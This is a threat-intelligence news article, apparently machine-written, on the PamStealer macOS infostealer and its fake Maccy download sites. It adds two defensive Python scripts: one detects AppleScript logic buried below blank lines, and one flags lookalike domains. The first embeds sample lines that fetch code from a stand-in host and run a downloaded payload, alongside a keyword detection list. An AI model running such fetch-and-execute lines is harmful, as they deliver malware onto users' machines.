Ethical Hacking News

PamStealer: A Sophisticated macOS Information Stealer Utilizing Fake Websites and PAM Checks



PamStealer is macOS malware designed to steal sensitive information, in particular the user's login password. It is delivered through fake websites impersonating a legitimate clipboard manager and uses the macOS PAM system to validate the password it captures.

  • PamStealer is macOS malware built to steal the user's login password.
  • It reaches victims through fake clipboard manager websites and validates captured passwords against the macOS PAM system.
  • The dropper is a compiled AppleScript file impersonating Maccy, a legitimate open-source clipboard manager.
  • The primary access vector is a lookalike site (maccyapp[.]com) that tricks users into running the script and granting full file system access.
  • Environment checks derive a decryption key from a host fingerprint, so the second-stage payload is unlocked only on Apple Silicon systems.
  • The Rust-based second stage collects web browser data, cryptocurrency wallet information, iCloud Keychain data, and clipboard content for exfiltration.
  • A native-looking password prompt collects the system password and loops until the entry validates via the PAM API.



  • Threat Intelligence News

    PamStealer is a sophisticated piece of malware designed to steal sensitive information from macOS systems, particularly user login passwords. It combines several tricks to infect systems and siphon data: fake websites impersonating a legitimate clipboard manager, and the macOS Pluggable Authentication Modules (PAM) system for password validation.

    According to recent reports by Jamf Threat Labs, PamStealer takes its name from its ability to validate a victim's login password through the PAM API before capturing it. The malware is distributed as a compiled AppleScript (.scpt) file impersonating Maccy, a legitimate open-source clipboard manager. This initial dropper downloads and stages a follow-on payload, a Rust-based infostealer capable of credential theft, browser data collection, persistence, and exfiltration.

    The primary access vector is a lookalike site ("maccyapp[.]com") that mimics the real Maccy site ("maccy[.]app"). The deception aims to trick users into granting the malicious software full file system access. When the script is opened in Script Editor, it displays instructions to run it with the "⌘ + R" keyboard shortcut or the Run button; doing so executes the malicious logic, which is hidden in the file below a large block of empty lines.
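The "large block of empty lines" layout is something a defender can triage for directly. The following is an added example, not code from the report or from Jamf: it assumes the AppleScript source is already available as text (on macOS, `osadecompile suspicious.scpt` prints the source of a compiled script) and scans it for a long run of blank lines followed by code that shells out. The sample script, the threshold and the keyword list are this example's own constructions.

```python
"""Triage heuristic for AppleScript sources that bury their logic below a
large run of empty lines, as the PamStealer dropper is described to do.

Assumptions (not from the original report): the script is already plain text
(e.g. output of `osadecompile file.scpt` on macOS), BLANK_RUN_THRESHOLD is an
illustrative default, and the keyword list is a starting point, not a signature.
"""

import re
from dataclasses import dataclass, field

# Constructed sample: a benign-looking header line, 400 empty lines, then code
# that fetches and runs something with `do shell script`.
SAMPLE_SOURCE = (
    'display dialog "Press ⌘ + R or click Run to install Maccy"\n'
    + "\n" * 400
    + 'set cfg to do shell script "curl -fsSL https://example.invalid/c | base64 -d"\n'
    + 'do shell script "chmod +x /tmp/payload && /tmp/payload"\n'
)

BLANK_RUN_THRESHOLD = 100  # illustrative: flag runs of at least this many empty lines
SUSPICIOUS_CALLS = re.compile(r"do shell script|curl|base64|chmod \+x", re.IGNORECASE)


@dataclass
class Finding:
    longest_blank_run: int          # length of the longest run of empty lines
    code_lines_after_run: int       # non-blank lines that follow that run
    suspicious_hits: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Logic hidden below a big blank block is the pattern we care about;
        # keyword hits refine the verdict but are not required for it.
        return (self.longest_blank_run >= BLANK_RUN_THRESHOLD
                and self.code_lines_after_run > 0)


def analyze(source: str) -> Finding:
    """Locate the longest run of blank lines and inspect what comes after it."""
    lines = source.splitlines()
    longest, run, run_end = 0, 0, -1
    for idx, line in enumerate(lines):
        if line.strip() == "":
            run += 1
            if run > longest:
                longest, run_end = run, idx
        else:
            run = 0
    after = [l for l in lines[run_end + 1:] if l.strip()] if run_end >= 0 else []
    hits = sorted({m.group(0).lower()
                   for l in after for m in SUSPICIOUS_CALLS.finditer(l)})
    return Finding(longest, len(after), hits)


if __name__ == "__main__":
    f = analyze(SAMPLE_SOURCE)
    print(f"longest blank run: {f.longest_blank_run}, code lines after it: "
          f"{f.code_lines_after_run}, hits: {f.suspicious_hits}, "
          f"suspicious: {f.suspicious}")
```

Run it over decompiled sources in a user's Downloads folder and review anything flagged; a benign script rarely has hundreds of consecutive empty lines followed by `do shell script` calls, so the heuristic is cheap and low-noise.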

    Notably, this approach works even when the file still carries the com.apple.quarantine attribute, which makes the method attractive to attackers as Apple continues to tighten Gatekeeper and Terminal. Security researcher Thijs Xhaflaire stated that "Combined with a Rust-based second stage and a password capture workflow that validates credentials locally through PAM, the result is a quieter execution chain than we typically observe in commodity macOS stealers."

    The AppleScript dropper is environment-aware: it continues only after fingerprinting the host and determining that it is running on Apple Silicon. It derives a key from the fingerprint, which includes the CPU architecture, locale, keyboard layout, and time zone, and uses that key to unlock an encrypted configuration containing the payload URL and install path.

    On Intel-based Macs the derived key differs and fails to decode the configuration, so the dropper terminates. The script also refuses to execute in sandboxed or analysis environments, and on systems whose time zone, system locale, and keyboard input resolve to countries located in Eastern Europe, such as Russia, Belarus, Kazakhstan, Armenia, Azerbaijan, Kyrgyzstan, Moldova, Tajikistan, Uzbekistan, Turkmenistan, and Georgia.

    Once the checks pass, the script reaches out to an external server and downloads a Mach-O binary written in Rust that masquerades as the Finder app. This executable is responsible for harvesting data from web browsers, cryptocurrency wallet extensions, iCloud Keychain, and clipboard content. The captured information is then encrypted and exfiltrated to attacker-controlled infrastructure ("avenger-sync[.]live") over an outbound HTTP request.

    The malware also displays a native-looking password prompt that collects the victim's system password and validates it via the PAM API. If validation fails, it asks the user to re-enter the password, repeating the loop until the correct password is supplied. This is reinforced by a counterfeit alert stating that Maccy is damaged and needs to be moved to the Trash, a decoy that leads the victim to discard the lure and assume the download was simply broken.

    According to Alex Rodionov, the developer of Maccy, malicious sites impersonating Maccy have been distributing malware disguised as the legitimate software. The official Maccy website is the only trusted source; Rodionov has added a warning to the website and GitHub repository stating, "Beware of fake websites impersonating Maccy. Malicious sites (such as maccyapp[.]net and maccyapp[.]com) distribute malware disguised as Maccy."
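The two impersonation domains named above differ from the official one only by folding the "app" TLD into the second-level label, which is exactly the kind of lookalike a brand-aware filter over DNS or proxy logs can catch. The following is an added example, not code from Maccy or Jamf: the observed hostnames are constructed, the matching rules (brand substring in the registrable label, or edit distance of at most one from the brand) are this example's own, and the registrable-domain helper is a deliberately crude two-label split rather than a public suffix list lookup.

```python
"""Flag hostnames that impersonate a known brand domain.

Added example built around the Maccy lookalikes named in the report. The
rules here are illustrative; the only facts taken from the report are the
official domain (maccy.app) and the two fake ones (maccyapp.com, maccyapp.net).
"""

LEGIT_DOMAINS = {"maccy.app"}   # official Maccy site, per the report
BRAND = "maccy"

# Constructed sample of hostnames as they might appear in DNS or proxy logs.
OBSERVED_HOSTS = [
    "maccy.app",            # legitimate
    "downloads.maccy.app",  # legitimate subdomain
    "maccyapp.com",         # fake, named in the report
    "maccyapp.net",         # fake, named in the report
    "macy.app",             # constructed: one-character typosquat
    "avenger-sync.live",    # exfil host from the report; not a lookalike, so a
                            # blocklist, not this heuristic, is what catches it
    "github.com",
    "mac.com",
]


def _registrable(host: str) -> str:
    """Crude eTLD+1: the last two labels. Adequate for .com/.net/.app/.live;
    a production filter would consult the public suffix list instead."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def _edit_distance(a: str, b: str) -> int:
    """Levenshtein distance via the standard dynamic-programming table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        cur = [i]
        for j, cb in enumerate(b, start=1):
            cur.append(min(prev[j] + 1,              # deletion
                           cur[j - 1] + 1,           # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def is_lookalike(host: str) -> bool:
    """True when the host is not under a legitimate domain but its
    second-level label contains or closely resembles the brand."""
    reg = _registrable(host)
    if reg in LEGIT_DOMAINS:
        return False
    left = reg.split(".")[0].replace("-", "")
    if BRAND in left:                       # maccyapp.com, maccy-app.net
        return True
    return _edit_distance(left, BRAND) <= 1  # macy.app, maccyy.app


def triage(hosts) -> list[str]:
    """Return the sorted subset of hosts that look like brand impersonation."""
    return sorted(h for h in hosts if is_lookalike(h))


if __name__ == "__main__":
    for h in triage(OBSERVED_HOSTS):
        print("lookalike:", h)
```

The edit-distance rule is tuned for short brand names; for longer brands a threshold of one is too strict and for very short ones it is too loose, so treat the rule as a review queue feed rather than an automatic block decision.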

    PamStealer illustrates how macOS stealers continue to evolve, adopting quieter execution chains and native implementations that reduce traditional detection opportunities while remaining compatible with standard macOS features. Its combination of environment-aware gating, PAM-based password validation, and a Rust-based second stage shows the lengths attackers go to in order to evade detection and execute their payloads.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/PamStealer-A-Sophisticated-macOS-Information-Stealer-Utilizing-Fake-Websites-and-PAM-Checks-ehn.shtml
  • https://thehackernews.com/2026/07/pamstealer-uses-fake-maccy-sites-and.html


  • Published: Fri Jul 3 04:10:38 2026 by llama3.2 3B Q4_K_M